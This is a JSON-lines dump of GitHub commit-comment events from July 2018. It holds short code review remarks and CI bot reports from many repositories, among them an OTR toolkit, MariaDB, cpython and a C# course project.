{"id":"8037787406","type":"CommitCommentEvent","actor":{"login":"claucece"},"repo":{"name":"otrv4/libotr-ng-toolkit"},"payload":{"comment":{"id":29887059,"position":4,"line":22,"path":"src/helper.c","commit_id":"60da873465b73f5e8f2a15aa41349aedd7668ac1","created_at":"2018-07-30T13:42:38Z","updated_at":"2018-07-30T13:42:38Z","author_association":"MEMBER","body":"yeah, the fact that on the protocol is named like that, it does not mean that we follow that on code. In libotr-ng is lowercase. "}},"created_at":"2018-07-30T13:42:38Z"}
{"id":"8037788626","type":"CommitCommentEvent","actor":{"login":"claucece"},"repo":{"name":"otrv4/libotr-ng-toolkit"},"payload":{"comment":{"id":29887063,"position":11,"line":13,"path":"src/otrng_parse.c","commit_id":"68ff226acaa5e7e844761bceae66eae1f0a37ec4","created_at":"2018-07-30T13:42:50Z","updated_at":"2018-07-30T13:42:50Z","author_association":"MEMBER","body":"Thanks. :)"}},"created_at":"2018-07-30T13:42:50Z"}
{"id":"8037789296","type":"CommitCommentEvent","actor":{"login":"claucece"},"repo":{"name":"otrv4/libotr-ng-toolkit"},"payload":{"comment":{"id":29887069,"position":18,"line":19,"path":"src/otrng_parse.c","commit_id":"68ff226acaa5e7e844761bceae66eae1f0a37ec4","created_at":"2018-07-30T13:42:58Z","updated_at":"2018-07-30T13:42:58Z","author_association":"MEMBER","body":"Thanks :)"}},"created_at":"2018-07-30T13:42:58Z"}
{"id":"8037791891","type":"CommitCommentEvent","actor":{"login":"jcalta"},"repo":{"name":"jcalta/sagemaker-python-sdk"},"payload":{"comment":{"id":29887072,"position":null,"line":null,"path":null,"commit_id":"7d56fe6285f34c3c0edec4730e1698c7e4228b2f","created_at":"2018-07-30T13:43:24Z","updated_at":"2018-07-30T13:43:24Z","author_association":"OWNER","body":"https://github.com/aws/sagemaker-python-sdk/issues/320"}},"created_at":"2018-07-30T13:43:24Z"}
{"id":"8037795905","type":"CommitCommentEvent","actor":{"login":"claucece"},"repo":{"name":"otrv4/libotr-ng-toolkit"},"payload":{"comment":{"id":29887087,"position":15,"line":27,"path":"src/otrng_parse.c","commit_id":"dde5316e0930b265dce21435c7b98245b121dc1f","created_at":"2018-07-30T13:44:05Z","updated_at":"2018-07-30T13:44:05Z","author_association":"MEMBER","body":"Yes, because parsing parses the OTR messages, not the display. Yeah, just print the message"}},"created_at":"2018-07-30T13:44:05Z"}
{"id":"8037798152","type":"CommitCommentEvent","actor":{"login":"claucece"},"repo":{"name":"otrv4/libotr-ng-toolkit"},"payload":{"comment":{"id":29887102,"position":1,"line":1,"path":"src/readotr.c","commit_id":"9e14fe38b4717d71560e99dc74bea9b877f14f7d","created_at":"2018-07-30T13:44:27Z","updated_at":"2018-07-30T13:44:27Z","author_association":"MEMBER","body":"And has it been tested to see it is not leaking?"}},"created_at":"2018-07-30T13:44:27Z"}
{"id":"8037798959","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29887131,"position":null,"line":null,"path":null,"commit_id":"fd05ba6a790d0419951af86b5fb7668540ebe77b","created_at":"2018-07-30T13:44:34Z","updated_at":"2018-07-30T13:44:34Z","author_association":"COLLABORATOR","body":"🔥 [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/master/33/display/redirect) (on internal Jenkins) failed in stage 'Test run' 🔥 : hudson.AbortException: script returned exit code 2\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/master/33//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/master/fd05ba6a790d0419951af86b5fb7668540ebe77b/33/jenkins-results/api-diff/index.html)\nℹ️ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/master/fd05ba6a790d0419951af86b5fb7668540ebe77b/33/jenkins-results/apicomparison/index.html) (please review changes)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/master/fd05ba6a790d0419951af86b5fb7668540ebe77b/33/jenkins-results/generator-diff/index.html) (only version changes)\n🔥 [Test run failed](http://xamarin-storage/jenkins/xamarin-macios/master/fd05ba6a790d0419951af86b5fb7668540ebe77b/33/jenkins-results/tests/index.html) 🔥\n\n# Test results\n\n<details>\n<summary>2 tests failed, 0 tests skipped, 223 tests passed.</summary>\n\n## Failed tests\n\n * System.Core/watchOS - simulator/Debug: Failed\n * MTouch tests/NUnit: Failed (Execution failed with exit code 1)\n</details>\n"}},"created_at":"2018-07-30T13:44:34Z"}
{"id":"8037800780","type":"CommitCommentEvent","actor":{"login":"GuilhermeMatheus"},"repo":{"name":"GuilhermeMatheus/alura-csharp-pt9"},"payload":{"comment":{"id":29887136,"position":17,"line":17,"path":"CSharpPT9/1_FileStreamEEncoding.cs","commit_id":"fb0c9ef8e246c0eb15ff2d274a10df4181e832e3","created_at":"2018-07-30T13:44:52Z","updated_at":"2018-07-30T13:44:52Z","author_association":"OWNER","body":"Não precisa ser absoluto. Contudo, não é sempre que o diretório do executável será o working directory. Mas, na maioria das vezes sempre será e em muitos projetos as pessoas não se preocupam com isso.\r\n\r\nPodemos usar então usar o running point da app e colocar um \"Para saber mais\" falando sobre isto que citei?"}},"created_at":"2018-07-30T13:44:52Z"}
{"id":"8037801974","type":"CommitCommentEvent","actor":{"login":"GuilhermeMatheus"},"repo":{"name":"GuilhermeMatheus/alura-csharp-pt9"},"payload":{"comment":{"id":29887140,"position":36,"line":36,"path":"CSharpPT9/1_FileStreamEEncoding.cs","commit_id":"fb0c9ef8e246c0eb15ff2d274a10df4181e832e3","created_at":"2018-07-30T13:45:03Z","updated_at":"2018-07-30T13:45:03Z","author_association":"OWNER","body":"Vai sim"}},"created_at":"2018-07-30T13:45:03Z"}
{"id":"8037812340","type":"CommitCommentEvent","actor":{"login":"claucece"},"repo":{"name":"otrv4/libotr-ng-toolkit"},"payload":{"comment":{"id":29887169,"position":11,"line":11,"path":"src/decode.h","commit_id":"3a56d07d5dda81fa5d46e842bfcee6aa94182d4d","created_at":"2018-07-30T13:46:42Z","updated_at":"2018-07-30T13:46:42Z","author_association":"MEMBER","body":"This now reads weird. You call a function 'parse' that now 'decodes' each message. What is the difference between parsing and decoding?"}},"created_at":"2018-07-30T13:46:42Z"}
{"id":"8037812870","type":"CommitCommentEvent","actor":{"login":"TobyGoodwin"},"repo":{"name":"rakitzis/rc"},"payload":{"comment":{"id":29887170,"position":null,"line":null,"path":null,"commit_id":"9d071b26bf1b1dcd71efb06dc4fb6c25803856a0","created_at":"2018-07-30T13:46:47Z","updated_at":"2018-07-30T13:46:47Z","author_association":"COLLABORATOR","body":"Good test case, thanks for sharing, and yes you're totally right about the expected behaviour.\r\n\r\nIf you configure \"--enable-develop\", you'll see that the syntax tree treatment of the inner `if not` is working as expected. But we're still clobbering `if_state` somehow.\r\n\r\nPlease do share your patch. I reserve the right to try to improve it :smile: "}},"created_at":"2018-07-30T13:46:47Z"}
{"id":"8037816181","type":"CommitCommentEvent","actor":{"login":"GuilhermeMatheus"},"repo":{"name":"GuilhermeMatheus/alura-csharp-pt9"},"payload":{"comment":{"id":29887181,"position":15,"line":15,"path":"CSharpPT9/2_FileStreamEStreamReader.cs","commit_id":"fb0c9ef8e246c0eb15ff2d274a10df4181e832e3","created_at":"2018-07-30T13:47:20Z","updated_at":"2018-07-30T13:47:20Z","author_association":"OWNER","body":"Exatamente.\r\n\r\n1. Vamos começar usando o método Close\r\n2. vamos lembrar brevemente a discussão do \"E se houver exceção? E se a referência for nula\" do curso de Exceptions\r\n3. vamos perceber que o Close poderia ser usado no Dispose\r\n4. vamos notar que de fato isso acontece e usamos no bloco using"}},"created_at":"2018-07-30T13:47:20Z"}
{"id":"8037816760","type":"CommitCommentEvent","actor":{"login":"nswbmw"},"repo":{"name":"AschPlatform/asch-core"},"payload":{"comment":{"id":29887182,"position":14,"line":875,"path":"src/core/blocks.js","commit_id":"81bd753a9974b41b556a970a33d5c9b05119bbf7","created_at":"2018-07-30T13:47:26Z","updated_at":"2018-07-30T13:47:26Z","author_association":"NONE","body":"不用赋值 undefined"}},"created_at":"2018-07-30T13:47:26Z"}
{"id":"8037819493","type":"CommitCommentEvent","actor":{"login":"AriDEV"},"repo":{"name":"ProjectSkyfire/SkyFire.548"},"payload":{"comment":{"id":29887189,"position":13,"line":13,"path":"sql/updates/world/2018_07_30_01_world.sql","commit_id":"32299b2d496f2b6a5062658d777d6afc717fd8a1","created_at":"2018-07-30T13:47:53Z","updated_at":"2018-07-30T13:47:53Z","author_association":"MEMBER","body":"![looksgood](https://media1.giphy.com/media/3oz8xQQP4ahKiyuxHy/giphy.gif)"}},"created_at":"2018-07-30T13:47:53Z"}
{"id":"8037821190","type":"CommitCommentEvent","actor":{"login":"nswbmw"},"repo":{"name":"AschPlatform/asch-core"},"payload":{"comment":{"id":29887193,"position":26,"line":883,"path":"src/core/blocks.js","commit_id":"81bd753a9974b41b556a970a33d5c9b05119bbf7","created_at":"2018-07-30T13:48:11Z","updated_at":"2018-07-30T13:48:11Z","author_association":"NONE","body":"( err, ret ) lint 过了吗？应该是 (err, ret)"}},"created_at":"2018-07-30T13:48:11Z"}
{"id":"8037822775","type":"CommitCommentEvent","actor":{"login":"dr-m"},"repo":{"name":"MariaDB/server"},"payload":{"comment":{"id":29887197,"position":19,"line":573,"path":"storage/innobase/dict/dict0boot.cc","commit_id":"92bdc28b5c88c7ccabe250a7b607089a23ad66fd","created_at":"2018-07-30T13:48:24Z","updated_at":"2018-07-30T13:48:24Z","author_association":"CONTRIBUTOR","body":"I would use `mach_read_from_4()` and only indent by 1 extra TAB. Do we really want to reserve all 32 bits for the encryption status? I’d only use at most 1 byte, preferrably the 2 most significant bits."}},"created_at":"2018-07-30T13:48:24Z"}
{"id":"8037827059","type":"CommitCommentEvent","actor":{"login":"tamseo"},"repo":{"name":"itdevsamurai/ds-rcrm-front"},"payload":{"comment":{"id":29887209,"position":44,"line":214,"path":"src/views/Pages/Category/Category.js","commit_id":"0efa2f174150e83ac79b6639734cc4e31a42333d","created_at":"2018-07-30T13:49:07Z","updated_at":"2018-07-30T13:49:07Z","author_association":"CONTRIBUTOR","body":"Hihi đang định làm cái này 👍 "}},"created_at":"2018-07-30T13:49:07Z"}
{"id":"8037830194","type":"CommitCommentEvent","actor":{"login":"zhangww2015"},"repo":{"name":"zhangww2015/awesome-python3-webapp"},"payload":{"comment":{"id":29887215,"position":null,"line":null,"path":null,"commit_id":"2ce2f314760a1bd8b141e1bff46a3a843ca51095","created_at":"2018-07-30T13:49:37Z","updated_at":"2018-07-30T13:49:37Z","author_association":"OWNER","body":"Desktop.ini"}},"created_at":"2018-07-30T13:49:37Z"}
{"id":"8037831370","type":"CommitCommentEvent","actor":{"login":"brandon1780"},"repo":{"name":"brandon1780/BotFramework-DirectLineJS"},"payload":{"comment":{"id":29887217,"position":null,"line":null,"path":null,"commit_id":"a1e4bfc21d8a677a3d931cd3d200b33691e1e1bb","created_at":"2018-07-30T13:49:49Z","updated_at":"2018-07-30T13:49:49Z","author_association":"OWNER","body":"reales [update[](url)``"}},"created_at":"2018-07-30T13:49:49Z"}
{"id":"8037833715","type":"CommitCommentEvent","actor":{"login":"nswbmw"},"repo":{"name":"AschPlatform/asch-core"},"payload":{"comment":{"id":29887223,"position":6,"line":152,"path":"src/core/transactions.js","commit_id":"81bd753a9974b41b556a970a33d5c9b05119bbf7","created_at":"2018-07-30T13:50:13Z","updated_at":"2018-07-30T13:50:13Z","author_association":"NONE","body":"req.body 还是 req.query?"}},"created_at":"2018-07-30T13:50:13Z"}
{"id":"8037836160","type":"CommitCommentEvent","actor":{"login":"GuilhermeMatheus"},"repo":{"name":"GuilhermeMatheus/alura-csharp-pt9"},"payload":{"comment":{"id":29887228,"position":17,"line":17,"path":"CSharpPT9/3_EscrevendoArquivos.cs","commit_id":"fb0c9ef8e246c0eb15ff2d274a10df4181e832e3","created_at":"2018-07-30T13:50:36Z","updated_at":"2018-07-30T13:50:36Z","author_association":"OWNER","body":"Esse construtor de StreamWriter usa o UTF-8. Não vamos ter problemas com caracteres ainda."}},"created_at":"2018-07-30T13:50:36Z"}
{"id":"8037842656","type":"CommitCommentEvent","actor":{"login":"GuilhermeMatheus"},"repo":{"name":"GuilhermeMatheus/alura-csharp-pt9"},"payload":{"comment":{"id":29887242,"position":26,"line":26,"path":"CSharpPT9/3_EscrevendoArquivos.cs","commit_id":"fb0c9ef8e246c0eb15ff2d274a10df4181e832e3","created_at":"2018-07-30T13:51:41Z","updated_at":"2018-07-30T13:51:41Z","author_association":"OWNER","body":"Justo. Vou usar o `Console.ReadLine` então e escrevendo o que o usuário digita na tela"}},"created_at":"2018-07-30T13:51:41Z"}
{"id":"8037842872","type":"CommitCommentEvent","actor":{"login":"twinaphex"},"repo":{"name":"reicast/reicast-emulator"},"payload":{"comment":{"id":29887244,"position":null,"line":null,"path":null,"commit_id":"92c06a72499479a01e96543594ce7fe0bf260dcb","created_at":"2018-07-30T13:51:43Z","updated_at":"2018-07-30T13:51:43Z","author_association":"CONTRIBUTOR","body":"Implementing this makes the EG Hack unnecessary now. Thanks a lot!"}},"created_at":"2018-07-30T13:51:43Z"}
{"id":"8037843941","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29887248,"position":null,"line":null,"path":null,"commit_id":"14b7f13120002ccd690f3abc3b40ea7f66db0906","created_at":"2018-07-30T13:51:53Z","updated_at":"2018-07-30T13:51:53Z","author_association":"COLLABORATOR","body":"Puzzle `1218-6ccd8af1` discovered in   [`src/main/groovy/com/zerocracy/stk/pmo/awards/refresh_awards.groovy`](  https://github.com/zerocracy/farm/blob/master/src/main/groovy/com/zerocracy/stk/pmo/awards/refresh_awards.groovy)   and submitted as #1508. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-30T13:51:53Z"}
{"id":"8037847013","type":"CommitCommentEvent","actor":{"login":"Muu0719"},"repo":{"name":"Muu0719/myRepository1"},"payload":{"comment":{"id":29887252,"position":1,"line":1,"path":"test.txt","commit_id":"bf9e532a2cab18302c0ae7e9c9095cb8c3f5ef58","created_at":"2018-07-30T13:52:22Z","updated_at":"2018-07-30T13:52:22Z","author_association":"OWNER","body":"wtf??"}},"created_at":"2018-07-30T13:52:22Z"}
{"id":"8037847219","type":"CommitCommentEvent","actor":{"login":"jeromesimeon"},"repo":{"name":"querycert/qcert"},"payload":{"comment":{"id":29887253,"position":null,"line":null,"path":null,"commit_id":"63e8cae5dd9716f4d60bc2af9beda2b5b5464aaa","created_at":"2018-07-30T13:52:24Z","updated_at":"2018-07-30T13:52:24Z","author_association":"MEMBER","body":"Resolves #103 "}},"created_at":"2018-07-30T13:52:24Z"}
{"id":"8037848041","type":"CommitCommentEvent","actor":{"login":"bitcraft"},"repo":{"name":"Tuxemon/Tuxemon"},"payload":{"comment":{"id":29887255,"position":null,"line":null,"path":null,"commit_id":"7344a0311a788ab7366805a89b5ccc4d73ed8aa6","created_at":"2018-07-30T13:52:32Z","updated_at":"2018-07-30T13:52:32Z","author_association":"COLLABORATOR","body":"Most people do not keep up with deps and are often missing them, so I tested what will happen if cbor is not present."}},"created_at":"2018-07-30T13:52:32Z"}
{"id":"8037849279","type":"CommitCommentEvent","actor":{"login":"jeromesimeon"},"repo":{"name":"querycert/qcert"},"payload":{"comment":{"id":29887259,"position":null,"line":null,"path":null,"commit_id":"08a6601dedfe52e1481799cedf181247974397b1","created_at":"2018-07-30T13:52:44Z","updated_at":"2018-07-30T13:52:44Z","author_association":"MEMBER","body":"Resolves Coq part of #104 "}},"created_at":"2018-07-30T13:52:44Z"}
{"id":"8037850532","type":"CommitCommentEvent","actor":{"login":"GuilhermeMatheus"},"repo":{"name":"GuilhermeMatheus/alura-csharp-pt9"},"payload":{"comment":{"id":29887260,"position":20,"line":20,"path":"CSharpPT9/4_StreamsDeCompressaos.cs","commit_id":"fb0c9ef8e246c0eb15ff2d274a10df4181e832e3","created_at":"2018-07-30T13:52:55Z","updated_at":"2018-07-30T13:52:55Z","author_association":"OWNER","body":"Concordo"}},"created_at":"2018-07-30T13:52:55Z"}
{"id":"8037851571","type":"CommitCommentEvent","actor":{"login":"nswbmw"},"repo":{"name":"AschPlatform/asch-core"},"payload":{"comment":{"id":29887263,"position":75,"line":438,"path":"src/core/transactions.js","commit_id":"81bd753a9974b41b556a970a33d5c9b05119bbf7","created_at":"2018-07-30T13:53:06Z","updated_at":"2018-07-30T13:53:06Z","author_association":"NONE","body":"改成 block && block.id 好一些"}},"created_at":"2018-07-30T13:53:06Z"}
{"id":"8037855586","type":"CommitCommentEvent","actor":{"login":"jdemeyer"},"repo":{"name":"jdemeyer/cpython"},"payload":{"comment":{"id":29887273,"position":22,"line":350,"path":"Include/object.h","commit_id":"ea8e94921f528544865e49352413eb2101e7640c","created_at":"2018-07-30T13:53:45Z","updated_at":"2018-07-30T13:53:45Z","author_association":"OWNER","body":"> Hmm, I forgot why we should pay special care when adding new slot, if type object can be not stable...\r\n\r\nWhat is important the the **number** of fields remains the same because you want this to work:\r\n```\r\nPyTypeObject PyCFunction_Type = {\r\n    PyVarObject_HEAD_INIT(&PyType_Type, 0)\r\n    \"builtin_function_or_method\",\r\n    sizeof(PyCFunctionObject),\r\n    0,\r\n    (destructor)meth_dealloc,                   /* tp_dealloc */\r\n    offsetof(PyCFunctionObject, m_ccall),       /* tp_ccalloffset */\r\n    0,                                          /* tp_getattr */\r\n    0,                                          /* tp_setattr */\r\n    0,                                          /* tp_as_async */\r\n```\r\nSo while we can change a field, we cannot remove one or add a new one in between."}},"created_at":"2018-07-30T13:53:45Z"}
{"id":"8037856464","type":"CommitCommentEvent","actor":{"login":"GuilhermeMatheus"},"repo":{"name":"GuilhermeMatheus/alura-csharp-pt9"},"payload":{"comment":{"id":29887277,"position":19,"line":19,"path":"CSharpPT9/5_Binario.cs","commit_id":"fb0c9ef8e246c0eb15ff2d274a10df4181e832e3","created_at":"2018-07-30T13:53:53Z","updated_at":"2018-07-30T13:53:53Z","author_association":"OWNER","body":"Beleza"}},"created_at":"2018-07-30T13:53:53Z"}
{"id":"8037857812","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29887282,"position":null,"line":null,"path":null,"commit_id":"0f283150af572edfe4df45e6d4974bd7a9d56219","created_at":"2018-07-30T13:54:07Z","updated_at":"2018-07-30T13:54:07Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-447](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-447).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-447-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-30T13:54:07Z"}
{"id":"8037857887","type":"CommitCommentEvent","actor":{"login":"kholia"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":29887284,"position":5,"line":36,"path":"src/charset.h","commit_id":"bf2048be86c352efdd02b107687a464937c81bd3","created_at":"2018-07-30T13:54:08Z","updated_at":"2018-07-30T13:54:08Z","author_association":"COLLABORATOR","body":"It's now a confirmed cause of #3333."}},"created_at":"2018-07-30T13:54:08Z"}
{"id":"8037860875","type":"CommitCommentEvent","actor":{"login":"kartikay101"},"repo":{"name":"kartikay101/file-header"},"payload":{"comment":{"id":29887292,"position":null,"line":null,"path":null,"commit_id":"d006e791e8f3b0cd766eabc2f17d88212d58527d","created_at":"2018-07-30T13:54:37Z","updated_at":"2018-07-30T13:54:37Z","author_association":"OWNER","body":"Settings seem to last for restarting the App, but a system reboot resets the username to the System username :< :-1: "}},"created_at":"2018-07-30T13:54:37Z"}
{"id":"8037861683","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"NateWickstrom/rock-paper-scissors-solidity"},"payload":{"comment":{"id":29887294,"position":34,"line":30,"path":"RockPaperScissorsUtils.sol","commit_id":"a51e296116c99dd52710a9046c08cf9bcc47b957","created_at":"2018-07-30T13:54:45Z","updated_at":"2018-07-30T13:54:45Z","author_association":"NONE","body":"What valid move is `0` now that `ROCK = 1`..."}},"created_at":"2018-07-30T13:54:45Z"}
{"id":"8037862439","type":"CommitCommentEvent","actor":{"login":"Yangjiaxin121"},"repo":{"name":"Yangjiaxin121/JavaProject"},"payload":{"comment":{"id":29887295,"position":null,"line":null,"path":null,"commit_id":"4ced374955a753184524762cc3f7833607c36b61","created_at":"2018-07-30T13:54:53Z","updated_at":"2018-07-30T13:54:53Z","author_association":"OWNER","body":"飞机订票管理系统"}},"created_at":"2018-07-30T13:54:53Z"}
{"id":"8037865639","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"NateWickstrom/rock-paper-scissors-solidity"},"payload":{"comment":{"id":29887303,"position":46,"line":38,"path":"RockPaperScissorsUtils.sol","commit_id":"a51e296116c99dd52710a9046c08cf9bcc47b957","created_at":"2018-07-30T13:55:23Z","updated_at":"2018-07-30T13:55:23Z","author_association":"NONE","body":"These 3 little functions are a bit overkill for such a simple comparison."}},"created_at":"2018-07-30T13:55:23Z"}
{"id":"8037869855","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"NateWickstrom/rock-paper-scissors-solidity"},"payload":{"comment":{"id":29887307,"position":33,"line":29,"path":"RockPaperScissorsUtils.sol","commit_id":"a51e296116c99dd52710a9046c08cf9bcc47b957","created_at":"2018-07-30T13:56:03Z","updated_at":"2018-07-30T13:56:03Z","author_association":"NONE","body":"Why not make the function `public` so you can test it?\r\nOr test it via a child contract that exposes it."}},"created_at":"2018-07-30T13:56:03Z"}
{"id":"8037869896","type":"CommitCommentEvent","actor":{"login":"Quinn-Donnelly"},"repo":{"name":"Quinn-Donnelly/projectOne"},"payload":{"comment":{"id":29887308,"position":null,"line":null,"path":null,"commit_id":"ac8029cbe7fbd4691e709a1cb2382a7754bcdcb3","created_at":"2018-07-30T13:56:04Z","updated_at":"2018-07-30T13:56:04Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Routes for Employee](https://trello.com/c/SwVOLGKr/18-routes-for-employee)"}},"created_at":"2018-07-30T13:56:04Z"}
{"id":"8037873263","type":"CommitCommentEvent","actor":{"login":"drupchen"},"repo":{"name":"Esukhia/derge-kangyur"},"payload":{"comment":{"id":29887312,"position":5,"line":3928,"path":"derge-kangyur-tags/008-tagged.txt","commit_id":"e9894f066f4d3f155f65df9b56c95bfadf2e52e0","created_at":"2018-07-30T13:56:35Z","updated_at":"2018-07-30T13:56:35Z","author_association":"NONE","body":"ཀྱིས། ཞེས་སྔར་ཡོད་པ་དེ་སྲུབ་འདུག"}},"created_at":"2018-07-30T13:56:35Z"}
{"id":"8037875744","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"NateWickstrom/rock-paper-scissors-solidity"},"payload":{"comment":{"id":29887314,"position":11,"line":9,"path":"RockPaperScissorsUtils.sol","commit_id":"a51e296116c99dd52710a9046c08cf9bcc47b957","created_at":"2018-07-30T13:56:59Z","updated_at":"2018-07-30T13:56:59Z","author_association":"NONE","body":"This one too could be `public`. Pretty important to test."}},"created_at":"2018-07-30T13:56:59Z"}
{"id":"8037875758","type":"CommitCommentEvent","actor":{"login":"hbbdyzf"},"repo":{"name":"gBringout/SphericalHarmonics"},"payload":{"comment":{"id":29887315,"position":null,"line":null,"path":null,"commit_id":"138bffb3a8de0e63169a6502f04a0dcc113f46ce","created_at":"2018-07-30T13:56:59Z","updated_at":"2018-07-30T13:56:59Z","author_association":"NONE","body":"Hello, I read your RebuildField7bis.m. if the mode='norm', the sqrt(2) in the ''Yc = sqrt(2)*K*L(m+1)*cos(m*phi);'' should be deleted."}},"created_at":"2018-07-30T13:56:59Z"}
{"id":"8037878272","type":"CommitCommentEvent","actor":{"login":"EricHanLiu"},"repo":{"name":"DDMAL/diva.js"},"payload":{"comment":{"id":29887320,"position":12,"line":37,"path":"source/js/plugins/metadata.js","commit_id":"1767e9bd2c5ce9af7fb0233bee9e29db6b03dd87","created_at":"2018-07-30T13:57:22Z","updated_at":"2018-07-30T13:57:22Z","author_association":"NONE","body":"yeah agreed, will move it to a modal "}},"created_at":"2018-07-30T13:57:22Z"}
{"id":"8037879197","type":"CommitCommentEvent","actor":{"login":"krOoze"},"repo":{"name":"KhronosGroup/Vulkan-Docs"},"payload":{"comment":{"id":29887326,"position":41,"line":3428,"path":"chapters/synchronization.txt","commit_id":"ff0c2339083b76aba0414afafdb195bba15c78d8","created_at":"2018-07-30T13:57:30Z","updated_at":"2018-07-30T13:57:30Z","author_association":"CONTRIBUTOR","body":"Missing VUID?"}},"created_at":"2018-07-30T13:57:30Z"}
{"id":"8037880214","type":"CommitCommentEvent","actor":{"login":"GuilhermeMatheus"},"repo":{"name":"GuilhermeMatheus/alura-csharp-pt9"},"payload":{"comment":{"id":29887328,"position":31,"line":31,"path":"CSharpPT9/7_Serializacao.cs","commit_id":"fb0c9ef8e246c0eb15ff2d274a10df4181e832e3","created_at":"2018-07-30T13:57:40Z","updated_at":"2018-07-30T13:57:40Z","author_association":"OWNER","body":"No curso Java não tem isso. Não temos curso de serialização C#"}},"created_at":"2018-07-30T13:57:40Z"}
{"id":"8037881371","type":"CommitCommentEvent","actor":{"login":"EricHanLiu"},"repo":{"name":"DDMAL/diva.js"},"payload":{"comment":{"id":29887330,"position":5,"line":246,"path":"source/js/toolbar.js","commit_id":"f55112db126c716bfc2f4c31d8c91272cf0e3402","created_at":"2018-07-30T13:57:50Z","updated_at":"2018-07-30T13:57:50Z","author_association":"NONE","body":"function declaration within a loop"}},"created_at":"2018-07-30T13:57:50Z"}
{"id":"8037887862","type":"CommitCommentEvent","actor":{"login":"flyinghead"},"repo":{"name":"libretro/reicast-emulator"},"payload":{"comment":{"id":29887341,"position":null,"line":null,"path":null,"commit_id":"9b4cbc4a4552316ccccd973633b05587064b3c0a","created_at":"2018-07-30T13:58:50Z","updated_at":"2018-07-30T13:58:50Z","author_association":"NONE","body":"Really? I haven't tested all these games!"}},"created_at":"2018-07-30T13:58:50Z"}
{"id":"8037890240","type":"CommitCommentEvent","actor":{"login":"johanez"},"repo":{"name":"baidu/ntripcaster"},"payload":{"comment":{"id":29887344,"position":null,"line":null,"path":null,"commit_id":"476502cd4732f90664a7676270e2f549cf2e3364","created_at":"2018-07-30T13:59:13Z","updated_at":"2018-07-30T13:59:13Z","author_association":"NONE","body":"Dear tthhee,\r\nI'm very happy you made an ntrip caster version with auto mount point.\r\nhttps://github.com/baidu/ntripcaster\r\n\r\nhow ever, I have trouble using it.\r\n\r\nIt would help em a lot if you could elaborate a bit on the use:\r\n- is the intended use, that rovers can send their locatiosn via NMEA and will be connected tot eh nearest mountpoint automatically?\r\n- do i need to create an AUTO entry in sourcetable.dat  ?\r\n- do the mountpoitns specified in the mountpos.conf also be present in the sourcetable.dat\r\n\r\nThank you a lot,\r\njohannes"}},"created_at":"2018-07-30T13:59:13Z"}
{"id":"8037892713","type":"CommitCommentEvent","actor":{"login":"sebastianbenz"},"repo":{"name":"ampproject/amp-toolbox"},"payload":{"comment":{"id":29887352,"position":4,"line":19,"path":"optimizer/lib/transformers/PruneDuplicateResourceHints.js","commit_id":"be062b766d08e1465b22c00fb0b6e64343b7984b","created_at":"2018-07-30T13:59:37Z","updated_at":"2018-07-30T13:59:37Z","author_association":"COLLABORATOR","body":"Would using a Set make a difference performance wise?"}},"created_at":"2018-07-30T13:59:37Z"}
{"id":"8037893552","type":"CommitCommentEvent","actor":{"login":"drupchen"},"repo":{"name":"Esukhia/derge-kangyur"},"payload":{"comment":{"id":29887354,"position":5,"line":4480,"path":"derge-kangyur-tags/076-tagged.txt","commit_id":"e9894f066f4d3f155f65df9b56c95bfadf2e52e0","created_at":"2018-07-30T13:59:45Z","updated_at":"2018-07-30T13:59:45Z","author_association":"NONE","body":"སྲུབ་དགོས་པ་རང་ཡིན་ན་མེད་ན།"}},"created_at":"2018-07-30T13:59:45Z"}
{"id":"8037894171","type":"CommitCommentEvent","actor":{"login":"benjaminreid"},"repo":{"name":"simpleweb/react-native-camera"},"payload":{"comment":{"id":29887355,"position":null,"line":null,"path":null,"commit_id":"6aa8cbeb5c5b904c367f4f0005342fcd07ef1c03","created_at":"2018-07-30T13:59:50Z","updated_at":"2018-07-30T13:59:50Z","author_association":"MEMBER","body":"https://github.com/react-native-community/react-native-camera/issues/1638#issuecomment-398178060"}},"created_at":"2018-07-30T13:59:50Z"}
{"id":"8037895009","type":"CommitCommentEvent","actor":{"login":"glassez"},"repo":{"name":"qbittorrent/qBittorrent"},"payload":{"comment":{"id":29887357,"position":4,"line":831,"path":"src/webui/api/torrentscontroller.cpp","commit_id":"ed1ddc6c0ee2d2be906a11d5ea028a4ab06e253e","created_at":"2018-07-30T13:59:58Z","updated_at":"2018-07-30T13:59:58Z","author_association":"MEMBER","body":"IMO, \"change\" or \"modify\" is better than \"edit\" in this case."}},"created_at":"2018-07-30T13:59:58Z"}
{"id":"8037900339","type":"CommitCommentEvent","actor":{"login":"Necromaggus"},"repo":{"name":"Necromaggus/website"},"payload":{"comment":{"id":29887378,"position":null,"line":null,"path":null,"commit_id":"6159b6cd42f3d3379622f89d816b3d3b4471a2ea","created_at":"2018-07-30T14:00:45Z","updated_at":"2018-07-30T14:00:45Z","author_association":"OWNER","body":"Associating with #3 with this commit."}},"created_at":"2018-07-30T14:00:45Z"}
